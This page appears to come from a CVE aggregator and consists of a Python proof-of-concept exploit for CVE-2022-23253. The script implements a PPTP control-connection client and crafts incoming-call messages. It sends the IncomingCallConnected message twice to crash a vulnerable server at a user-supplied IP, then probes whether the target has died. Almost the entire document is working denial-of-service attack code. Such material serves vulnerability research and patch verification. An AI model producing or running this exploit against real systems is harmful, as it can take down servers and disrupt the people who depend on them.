4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2022-23253.py PY

import socket
import select
import secrets
import struct 
import argparse

CTL_PORT = 1723
TEST_SERVER = ""

# CTL Message Types
gStartControlConnectionRequest  = 1
gStartControlConnectionReply  = 2
gIncomingCallRequest  = 9
gIncomingCallReply  = 10
gIncomingCallConnected  = 11

# Framing Capabillities
gAsynchronousFraming = 0x1
gSynchronousFraming = 0x2

# Bearer Capabillities
gAnalogAccessSupported = 0x1
gDigitalAccessSupported = 0x2

class CtlClient():
    def __init__(self, serverIp, serverPort=CTL_PORT):
        self.IP = serverIp
        self.Port = serverPort

        self.Socket = None
        self.IsConnected = False

    def CtlCloseConn(self):
        self.Socket.close()

    def CtlSendMsg(self, CtlMessage, multiplier=1):
        if not self.IsConnected:
            raise RuntimeError("Attempted to send Ctl data on unconnected client")

        ctlmsgbuf: bytes = CtlMessage.build() * multiplier


        self.Socket.send(ctlmsgbuf)

    def CtlMultiSendMsg(self, CtlMessageArray):
        if not self.IsConnected:
            raise RuntimeError("Attempted to send Ctl data on unconnected client")

        sendBuffer = b""

        for CtlMsg in CtlMessageArray:
            sendBuffer += CtlMsg.build()

        self.Socket.send(sendBuffer)

    def CtlRecvMsg(self):
        chunks = []

        ready = select.select([self.Socket], [], [], 1)
        if ready[0]:
            chunk = self.Socket.recv(1024)
            chunks.append(chunk)

            while(len(chunk) == 1024):
                chunk = self.Socket.recv(1024)
                chunks.append(chunk)

        return b"".join(chunks)

    def CtlConnect(self, timeout=None):
        #Connect to the Ctl server 
        self.Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        if timeout:
            self.Socket.settimeout(timeout)

        self.Socket.connect((self.IP, self.Port))
        self.IsConnected = True
    
class ControlMessage():

    SIZE = 0xC # 12 byte header
    def __init__(self, messageType, messageLength, setSize=False, packetBytes=None):
        if packetBytes:
            self.MessageLength = 0
            self.PptpMessageType = 0
            #Magic number
            self.CtlMagic = 0
            self.CtlMessageType = 0
            self.Reserved0 = 0
            self.SetSize = 0
            self.__fromBytes(packetBytes)
        else:
            self.MessageLength = messageLength
            self.PptpMessageType = 0x1
            #Magic number
            self.CtlMagic = 0x1A2B3C4D
            self.CtlMessageType = messageType
            self.Reserved0 = 0
            self.SetSize = setSize

    def build(self):
        buffer = b""
        if self.SetSize:
            # Use the preconfigured set size for this packet
            self.MessageLength = self.__SIZE
        buffer += struct.pack(">H", self.MessageLength)
        buffer += struct.pack(">H", self.PptpMessageType)
        buffer += struct.pack(">I", self.CtlMagic)
        buffer += struct.pack(">H", self.CtlMessageType)
        
        buffer += struct.pack(">H", self.Reserved0)
        return buffer
    
    def __fromBytes(self, bytebuffer):
        header = struct.unpack_from(">HHIHH", bytebuffer, 0)
        self.MessageLength = header[0]
        self.PptpMessageType = header[1]
        self.CtlMagic = header[2]
        self.CtlMessageType = header[3]
        self.Reserved0 = header[4]

class StartControlConnectionRequest(ControlMessage):
    SIZE = 0x90
    def __init__(self, framing=gAsynchronousFraming, bearer=gAnalogAccessSupported, maxChannels=0x0, firmwareRevision=0x0, hostName=b"A" * 64, vendorString=b"B" * 64):
        
        super().__init__(gStartControlConnectionRequest, ControlMessage.SIZE + StartControlConnectionRequest.SIZE)
        self.protocolVersion = 0x100       
        self.Reserved1 = 0
        self.FramingCapabilities = framing
        self.BearerCapabilities = bearer
        self.MaxChannels = maxChannels
        self.FirmwareRevision = firmwareRevision
        self.HostName = hostName # 64 byte host name string 
        self.VendorString = vendorString # 64 byte vendor string
        
    def build(self):
        buffer = b""
        header = super().build()
        buffer += struct.pack(">H", self.protocolVersion)
        buffer += struct.pack(">H", self.Reserved1)
        buffer += struct.pack(">I", self.FramingCapabilities) 
        buffer += struct.pack(">I", self.BearerCapabilities)
        buffer += struct.pack(">H", self.MaxChannels)
        buffer += struct.pack(">H", self.FirmwareRevision)
        buffer += self.HostName
        buffer += self.VendorString

        return header + buffer

class StartControlConnectionReply(ControlMessage):
    SIZE = 0x90
    def __init__(self, framing=gAsynchronousFraming, bearer=gAnalogAccessSupported, maxChannels=0x0, firmwareRevision=0x0, hostName=b"A" * 64, vendorString=b"B" * 64, resultCode=0, errorCode=0, packetBytes=None):
        
        super().__init__(gStartControlConnectionReply, ControlMessage.SIZE + StartControlConnectionRequest.SIZE, packetBytes=packetBytes)
        if packetBytes:
            self.protocolVersion = 0       
            self.ResultCode = 0
            self.ErrorCode = 0
            self.FramingCapabilities = 0
            self.BearerCapabilities = 0
            self.MaxChannels = 0
            self.FirmwareRevision = 0
            self.HostName = 0 # 64 byte host name string 
            self.VendorString = 0 # 64 byte vendor string
            self.__fromBytes(packetBytes)
        else:
            self.protocolVersion = 0x100       
            self.ResultCode = resultCode
            self.ErrorCode = errorCode
            self.FramingCapabilities = framing
            self.BearerCapabilities = bearer
            self.MaxChannels = maxChannels
            self.FirmwareRevision = firmwareRevision
            self.HostName = hostName # 64 byte host name string 
            self.VendorString = vendorString # 64 byte vendor string
        
    def build(self):
        buffer = b""
        header = super().build()
        buffer += struct.pack(">H", self.protocolVersion)
        buffer += struct.pack(">B", self.ResultCode)
        buffer += struct.pack(">B", self.ErrorCode)
        buffer += struct.pack(">I", self.FramingCapabilities) 
        buffer += struct.pack(">I", self.BearerCapabilities)
        buffer += struct.pack(">H", self.MaxChannels)
        buffer += struct.pack(">H", self.FirmwareRevision)
        buffer += self.HostName
        buffer += self.VendorString
        return header + buffer
    
    def __fromBytes(self, bytebuffer):
        items = struct.unpack_from(">HBBIIHH", bytebuffer, ControlMessage.SIZE)
        self.protocolVersion = items[0]
        self.ResultCode = items[1]
        self.ErrorCode = items[2]
        self.FramingCapabilities = items[3]
        self.BearerCapabilities = items[4]
        self.MaxChannels = items[5]
        self.FirmwareRevision = items[6]


class IncomingCallRequest(ControlMessage):
    SIZE = 0xD0
    def __init__(self,CallId=1337, CallSerialNumber=1338, CallBearerType=gAnalogAccessSupported, PhysicalChannelId=0, DialedNumberLength=64, DialingNumberLength=64,DialedNumber=64 *b"A", DialingNumber = 64 * b"B", Subaddress= 64 * b"C", packetBytes=None):
        super().__init__(gIncomingCallRequest, IncomingCallRequest.SIZE + ControlMessage.SIZE, packetBytes=packetBytes)
        self.CallId = CallId
        self.CallSerialNumber = CallSerialNumber
        self.CallBearerType = CallBearerType
        self.PhysicalChannelId = PhysicalChannelId
        self.DialedNumberLength = DialedNumberLength
        self.DialingNumberLength = DialingNumberLength
        self.DialedNumber = DialedNumber
        self.DialingNumber = DialingNumber
        self.Subaddress = Subaddress

    def build(self):
        buffer = b""
        header = super().build()
        buffer += struct.pack(">H", self.CallId)
        buffer += struct.pack(">H", self.CallSerialNumber)
        buffer += struct.pack(">I", self.CallBearerType)
        buffer += struct.pack(">I", self.PhysicalChannelId)
        buffer += struct.pack(">H", self.DialedNumberLength)
        buffer += struct.pack(">H", self.DialingNumberLength)
        buffer += self.DialedNumber
        buffer += self.DialingNumber
        buffer += self.Subaddress
        return header + buffer

class IncomingCallReply(ControlMessage):
    SIZE = 0xC
    def __init__(self,CallId=0x1337, PeersCallId=0x1338, ResultCode=1, ErrorCode=0, PacketRecvWindowSize=64, PacketTransitDelay=32, packetBytes=None):
        super().__init__(gIncomingCallReply, IncomingCallReply.SIZE + ControlMessage.SIZE, packetBytes=packetBytes)
        if packetBytes:
            self.CallId = 0
            self.PeersCallId = 0
            self.ResultCode = 0
            self.ErrorCode = 0
            self.PacketRecvWindowSize = 0,
            self.PacketTransitDelay = 0
            self.Reserved1 = 0
            self.fromBytes(packetBytes)
        else:
            self.CallId = CallId
            self.PeersCallId = PeersCallId
            self.ResultCode = ResultCode
            self.ErrorCode = ErrorCode
            self.PacketRecvWindowSize = PacketRecvWindowSize,
            self.PacketTransitDelay = PacketTransitDelay
            self.Reserved1 = 0

    def build(self):
        buffer = b""
        header = super().build()
        buffer += struct.pack(">H", self.CallId)
        buffer += struct.pack(">H", self.PeersCallId)
        buffer += struct.pack(">B", self.ResultCode)
        buffer += struct.pack(">B", self.ErrorCode)
        buffer += struct.pack(">H", self.PacketRecvWindowSize)
        buffer += struct.pack(">H", self.PacketTransitDelay)
        buffer += struct.pack(">H", self.Reserved1)
        return header + buffer
        
    def fromBytes(self, bytebuffer):
        items = struct.unpack_from(">HHBBHHH", bytebuffer, ControlMessage.SIZE)
        self.CallId = items[0]
        self.PeersCallId = items[1]
        self.ResultCode = items[2]
        self.ErrorCode = items[3]
        self.PacketRecvWindowSize = items[4]
        self.PacketTransitDelay = items[5]
        self.Reserved1 = items[6]

class IncomingCallConnected(ControlMessage):
    SIZE = 0x10
    def __init__(self,PeerCallId=1337, ConnectSpeed=1, PacketRecvWindowsSize=64, PacketTransmitDelay=0, FramingType = gAsynchronousFraming, packetBytes=None):
        super().__init__(gIncomingCallConnected, IncomingCallConnected.SIZE + ControlMessage.SIZE, packetBytes=packetBytes)
        
        if packetBytes:
            pass
        else:
            self.PeerCallId = PeerCallId
            self.Reserved1 = 0
            self.ConnectSpeed = ConnectSpeed
            self.PacketRecvWindowSize = PacketRecvWindowsSize
            self.PacketTransmitDelay = PacketTransmitDelay
            self.FramingType = FramingType
    def build(self):
        buffer = b""
        header = super().build()
        buffer += struct.pack(">H", self.PeerCallId)
        buffer += struct.pack(">H", self.Reserved1)
        buffer += struct.pack(">I", self.ConnectSpeed)
        buffer += struct.pack(">H", self.PacketRecvWindowSize)
        buffer += struct.pack(">H", self.PacketTransmitDelay)
        buffer += struct.pack(">I", self.FramingType)

        return header + buffer

def startControlSession():
    pocClient = CtlClient(TEST_SERVER)
    initializeCtlConnection = StartControlConnectionRequest()
    pocClient.CtlConnect()
    pocClient.CtlSendMsg(initializeCtlConnection)
    StartControlReply_raw = pocClient.CtlRecvMsg()
    initializeCtlResponse = StartControlConnectionReply(packetBytes=StartControlReply_raw)

    if initializeCtlResponse.ErrorCode != 0 or initializeCtlResponse.ResultCode != 1:
        raise ValueError("[:(] PoC Failed unexpectadly due to server side error, investigation reqiured....")
    
    return pocClient

def poke_server():

    try:
        print("[+] Pokeing the target....")
        poke_client = CtlClient(TEST_SERVER)
        poke_client.CtlConnect(timeout=1)
        print("[-] Its alive!?")
    
    except Exception as e:
        print("[+] Yep, its dead")


def trigger_cve_2022_23253():
    print("[+] Starting PPTP control connection")
    
    pocClient = startControlSession()
    newCallId = secrets.randbelow(0x10000)
    newCallSerial = secrets.randbelow(0x10000)
    newIncomingCall = IncomingCallRequest(CallId=newCallId,CallSerialNumber=newCallSerial) #Requests Causing Issues
    print("[+] Creating new incoming call")
    pocClient.CtlSendMsg(newIncomingCall)
    
    ICReply_raw = pocClient.CtlRecvMsg()
    newIncomingCallReply = IncomingCallReply(packetBytes=ICReply_raw)
    print("[+] Incoming call reply received with call ID {}".format(newIncomingCallReply.CallId))
    if newIncomingCallReply.ResultCode != 1 or newIncomingCallReply.ErrorCode != 0:
        raise ValueError("[:(] PoC failed unexpecadle due to server side error... ")

    newIncomingCallConnected = IncomingCallConnected(newIncomingCallReply.CallId, 64, newIncomingCallReply.PacketRecvWindowSize, newIncomingCallReply.PacketTransitDelay)
    print("[+] Triggering Bug!")
    pocClient.CtlSendMsg(newIncomingCallConnected)
    pocClient.CtlSendMsg(newIncomingCallConnected)

    print("[+] Machine should be dead now, lets check!")
    poke_server()

def main():
    
    global TEST_SERVER
    global CTL_PORT

    parser = argparse.ArgumentParser(description="PoC for CVE-2022-23253!")
    parser.add_argument('--ip', type=str,required=True,dest="ip_address",help="IP address of the target server")
    parser.add_argument('--port', type=int, default=CTL_PORT,dest="ctl_port", help="Port of the PPTP CTL TCP socket, should remain as {} in most cases.".format(CTL_PORT))

    args = parser.parse_args()

    TEST_SERVER = args.ip_address
    CTL_PORT = args.ctl_port

    continue_to_trigger = input("[?] This PoC will crash a vulnerable server, do you want to continue [y/n]: ")

    if continue_to_trigger.lower() == "y":
        print("[+] Triggering Bug!")
        trigger_cve_2022_23253()
    else:
        print("[+] GoodBye!")

if __name__ == '__main__':
    main()